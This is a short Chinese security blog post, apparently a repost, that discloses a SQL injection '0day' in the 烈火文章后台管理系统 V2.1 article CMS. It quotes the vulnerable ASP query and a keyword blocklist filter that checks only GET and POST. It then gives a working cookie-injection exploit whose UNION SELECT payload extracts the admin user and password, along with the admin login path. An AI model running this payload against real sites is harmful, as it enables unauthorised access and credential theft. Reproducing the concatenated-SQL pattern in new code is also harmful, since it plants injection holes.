烈火文章后台管理系统 V2.1 0day

admin 2021年4月3日18:50:54评论3 views字数 1227阅读4分5秒阅读模式

    By:暗月式

    今天无聊就找了个简单的系统来分析学习,首先打开 article.asp 见如此语句:

以下是引用片段:

set rs=conn.execute("select * from article where id="&request("id"))%>完全用request接收

■ >

    随即看上内容:

    直接打开:Check_SqlIn.asp。

以下是引用片段:

'SQL通用防注入程序,只需要在conn.asp之类的打开数据库文件之前引用这个页面即可
dim sql_injdata
SQL_injdata ="'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
SQL_inj = split(SQL_Injdata,"|")
If Request.QueryString"" Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then
Response.Write ""
Response.end
end if
next
Next
End If
If Request.Form"" Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then
Response.Write ""
Response.end
end if
next
next
end if
%>

    很明显只是过滤 get 和 post,存在 cookies 注入,附上 Exp:

    javascript:alert(document.cookie="id="+escape("95 and 1=2 union select 1,2,3,user,5,6,password,8,9,10,11,12,13,14 from admin"));

    后台地址:admin/admin_login.asp。

文章来源于lcx.cc:烈火文章后台管理系统 V2.1 0day

相关推荐: 揭露一个飞机退改签的诈骗:借口机票退改签要退款,索要银行卡号,套取个人信息

揭露一个灰机退改签的诈骗...... Airbasic (?????????????????????????) | 2014-03-07 12:40 +85264504508 [短信] 告知我[我替朋友在淘宝买票]:飞机因故取消,退改签致电 400-89549…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:50:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   烈火文章后台管理系统 V2.1 0dayhttps://cn-sec.com/archives/318823.html

发表评论

匿名网友 填写信息